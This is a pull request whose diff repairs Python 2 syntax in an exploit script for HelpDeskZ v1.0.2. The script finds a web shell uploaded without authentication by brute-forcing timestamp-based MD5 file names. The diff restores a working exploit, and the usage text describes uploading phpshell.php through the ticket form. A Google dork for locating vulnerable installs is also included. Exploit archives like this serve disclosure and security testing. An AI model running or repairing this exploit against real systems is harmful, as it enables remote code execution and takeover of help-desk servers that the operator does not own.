### PR TITLE
Fix some syntax errors for 40300.py

### DIFF
--- a/exploits/php/webapps/40300.py
+++ b/exploits/php/webapps/40300.py
@@ -10,7 +10,7 @@
 # Software Link httpsgithub.comevolutionscriptHelpDeskZ-1.0archivemaster.zip
 # Version = v1.0.2
 # Tested on
-# CVE 
+# CVE
 
 HelpDeskZ = v1.0.2 suffers from an unauthenticated shell upload vulnerability.
 
@@ -39,8 +39,8 @@ import datetime
 
 print 'Helpdeskz v1.0.2 - Unauthenticated shell upload exploit'
 
-if len(sys.argv)  3
-    print Usage {} [baseUrl] [nameOfUploadedFile].format(sys.argv[0])
+if len(sys.argv) < 3:
+    print "Usage {} [baseUrl] [nameOfUploadedFile]".format(sys.argv[0])
     sys.exit(1)
 
 helpdeskzBaseUrl = sys.argv[1]
@@ -50,21 +50,20 @@ fileName = sys.argv[2]
 r = requests.get(helpdeskzBaseUrl)
 
 #Gets the current time of the server to prevent timezone errors - DoctorEww
-currentTime = int((datetime.datetime.strptime(r.headers['date'], %a, %d %b %Y %H%M%S %Z) - datetime.datetime(1970,1,1)).total_seconds())
+currentTime = int((datetime.datetime.strptime(r.headers['date'], '%a, %d %b %Y %H:%M:%S %Z')  - datetime.datetime(1970,1,1)).total_seconds())
 
-for x in range(0, 300)
+for x in range(0, 300):
     plaintext = fileName + str(currentTime - x)
     md5hash = hashlib.md5(plaintext).hexdigest()
 
     url = helpdeskzBaseUrl+md5hash+'.php'
     response = requests.head(url)
-    if response.status_code == 200
-        print found!
+    if response.status_code == 200:
+        print 'found!'
         print url
         sys.exit(0)
 
-print Sorry, I did not find anything
-
+print 'Sorry, I did not find anything'
 '''
 # Exploit Title: HelpDeskZ <= v1.0.2 - Unauthenticated Shell Upload
 # Google Dork: intext:"Help Desk Software by HelpDeskZ"
@@ -93,8 +92,8 @@ Enter anything in the mandatory fields, attach your phpshell.php, solve the capt
 
 Call this script with the base url of your HelpdeskZ-Installation and the name of the file you uploaded:
 
-exploit.py http://localhost/helpdeskz/ phpshell.php 
-            
+exploit.py http://localhost/helpdeskz/ phpshell.php
+
 import hashlib
 import time
 import sys


### PR DESCRIPTION
# Overview 
- Modify some syntax errors with `40300.py`.
- The fix adds some sinbols (`'`, `<` and `:` ) to be correct python2 syntax.

In line 53, this `datetime`'s syntax may depends on environment. So if not need, please restore it.

Tested it on my kali linux, it works.
